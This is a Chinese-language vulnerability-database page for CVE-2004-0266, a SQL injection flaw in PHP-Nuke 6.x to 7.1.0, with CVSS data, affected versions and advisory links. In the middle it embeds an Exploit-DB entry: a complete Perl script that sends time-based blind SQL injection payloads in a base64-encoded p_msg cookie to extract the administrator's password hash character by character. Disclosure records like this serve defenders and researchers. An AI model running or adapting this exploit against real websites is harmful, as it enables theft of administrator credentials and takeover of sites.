CVE-2004-0266
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:44
NMCOES    

[原文]SQL injection vulnerability in the "public message" capability (public_message) for Php-Nuke 6.x to 7.1.0 allows remote attackers obtain the administrator password via the c_mid parameter.


[CNNVD]PHP-Nuke Public Message SQL注入漏洞(CNNVD-200411-090)

        Php-Nuke 6.x到7.1.0的"public message"功能(public_message)存在漏洞。远程攻击者可以借助c_mid参数获得管理员密码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:francisco_burzi:php-nuke:6.0
cpe:/a:francisco_burzi:php-nuke:7.0
cpe:/a:francisco_burzi:php-nuke:6.6
cpe:/a:francisco_burzi:php-nuke:6.5_rc1
cpe:/a:francisco_burzi:php-nuke:7.1
cpe:/a:francisco_burzi:php-nuke:7.0_final
cpe:/a:francisco_burzi:php-nuke:6.5_rc2
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:francisco_burzi:php-nuke:6.5_beta1
cpe:/a:francisco_burzi:php-nuke:6.5_rc3
cpe:/a:francisco_burzi:php-nuke:6.7
cpe:/a:francisco_burzi:php-nuke:6.5
cpe:/a:francisco_burzi:php-nuke:6.5_final

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0266
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0266
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-090
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107635110327066&w=2
(UNKNOWN)  BUGTRAQ  20040208 [waraxe-2004-SA#003] - SQL injection in Php-Nuke 7.1.0
http://www.securityfocus.com/bid/9615
(VENDOR_ADVISORY)  BID  9615
http://xforce.iss.net/xforce/xfdb/15080
(VENDOR_ADVISORY)  XF  phpnuke-publicmessage-sql-injection(15080)

- 漏洞信息

PHP-Nuke Public Message SQL注入漏洞
中危 SQL注入
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        Php-Nuke 6.x到7.1.0的"public message"功能(public_message)存在漏洞。远程攻击者可以借助c_mid参数获得管理员密码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23670)

PHP-Nuke 6.x/7.x Public Message SQL Injection Vulnerability (EDBID:23670)
php webapps
2004-02-09 Verified
0 Janek Vind
N/A [点击下载]
source: http://www.securityfocus.com/bid/9615/info

It has been reported that the 'public message' feature of PHP-Nuke is vulnerable to an SQL injection vulnerability. The issue is due to improper sanitization of user-defined parameters supplied to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.


use MIME::Base64;
use IO::Socket;

#------------------------------------------------
$logfile = "nukelog.txt";
@chars = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
$data = "";
#------------------------------------------------
$remote = '127.0.0.1';
$port = 80;
$url = "/index.php";

# NB!! Tweak $md5times variable, to adjust the delay
# according to server`s perfomance and latency.

$md5times = 260000;

#------------------------------------------------
###################################
# #
# Calibration begins ... #
# #
###################################

$logline = "----- Page generation time meanvalue will be calculated now ----- " ;

print $logline . "\n";
Writelogline($logline);

$sum = 0;

for($cnt=0;$cnt<10;$cnt++)
{
    $charx = @chars[$cnt];
    $admin = "whateveraid:3974c84293fadcc0f0db9227fdd4cba3:";
    
    $admin = encode_base64($admin);
    $admin =~ s/\=/%3d/g;
    $admin =~ s/\n//g;

    $cookie = "lang=english; ";
    $cookie .= "admin=";
    $cookie .= $admin;

    $data = MakeGetRequest($remote, $url ,$cookie);
    $mytime = GetGenTime($data);
    
    $xtime = $mytime;
    $OK_CHARS='0-9';
    $xtime =~ s/[^$OK_CHARS]//go;
    $inttime = int($xtime);
    $sum += $inttime;
    
}

$meantime = int ($sum / 10);

$logline = "Mean page generation time --> " . $meantime . "ms " ;
print $logline . "\n";
Writelogline($logline);


#------------------------------------------------

$md5hash = "";

for($nr=1;$nr<33;$nr++)
{
    for($cnt=0;$cnt<16;$cnt++)
    {
        $charx = @chars[$cnt];

        $admin = "x' union select null,null,null,pwd from nuke_authors where name='God' AND IF(mid(pwd,". $nr .",1)='" . $charx ."',benchmark($md5times,md5('r00t')),1)/*";
    
        $admin = encode_base64($admin);
        $admin =~ s/\=/%3d/g;
        $admin =~ s/\n//g;

        $cookie = "p_msg=$admin; ";

        $data = MakeGetRequest($remote, $url ,$cookie);
        $mytime = GetGenTime($data);
    
        $xtime = $mytime;
        $OK_CHARS='0-9';
        $xtime =~ s/[^$OK_CHARS]//go;
        $inttime = int($xtime);

        $logline = "pos --> " . $nr . "char --> " . $charx . " --> " . $inttime;
        print $logline . "\n";
        Writelogline($logline);
        
        if(int(($inttime/$meantime))>5)
        {
            $md5hash .= @chars[$cnt];
            $logline = "current md5hash --> " . $md5hash;
            print $logline . "\n";
            Writelogline($logline);
            $cnt = 17;
            break;
        }

    }
}

$logline = "----- Final md5hash --> " . $md5hash . "-----";
print $logline . "\n";
Writelogline($logline);


exit();




sub MakeGetRequest()
{
    $socket = IO::Socket::INET->new(PeerAddr => $remote,
                PeerPort => $port,
                Proto => "tcp",
                Type => SOCK_STREAM)
	or die "Couldnt connect to $remote:$port : $@\n";
    $str = "GET " . $url . " HTTP/1.0\r\n";
    print $socket $str;
    print $socket "Cookie: $cookie\r\n";
    print $socket "Host: $remote\r\n\r\n";

    $buff = "";
    while ($answer = <$socket>)
    {
	$buff .= $answer;
    }
    close($socket);
    return $buff;
}

sub GetGenTime($data)
{
    $idx1 = index($data,"Page Generation: ");
    $buff1 = substr($data,$idx1+16,10);
    return $buff1;
}

######################################################
sub Writelogline($)
{
    $logline=$_[0];
    $writeline = $logline . "\n";
    open (LOG, ">>$logfile") || die "Can't open $logfile\n";
    print LOG $writeline;
    close LOG;
}
######################################################



		

- 漏洞信息

3901
PHP-Nuke mainfile.php c_mid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PHP-Nuke contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the p_msg variable in the mainfile.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-02-08 2004-02-08
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHP-Nuke Public Message SQL Injection Vulnerability
Input Validation Error 9615
Yes No
2004-02-09 12:00:00 2009-07-12 02:06:00
Discovery of this issue has been credited to Janek Vind <come2waraxe@yahoo.com>.

- 受影响的程序版本

Francisco Burzi PHP-Nuke 7.1
Francisco Burzi PHP-Nuke 7.0 FINAL
Francisco Burzi PHP-Nuke 7.0
Francisco Burzi PHP-Nuke 6.9
Francisco Burzi PHP-Nuke 6.7
Francisco Burzi PHP-Nuke 6.6
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 6.0

- 漏洞讨论

It has been reported that the 'public message' feature of PHP-Nuke is vulnerable to an SQL injection vulnerability. The issue is due to improper sanitization of user-defined parameters supplied to the module. As a result, an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

- 漏洞利用

No exploit is required to leverage this vulnerability. The following proof of concept has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站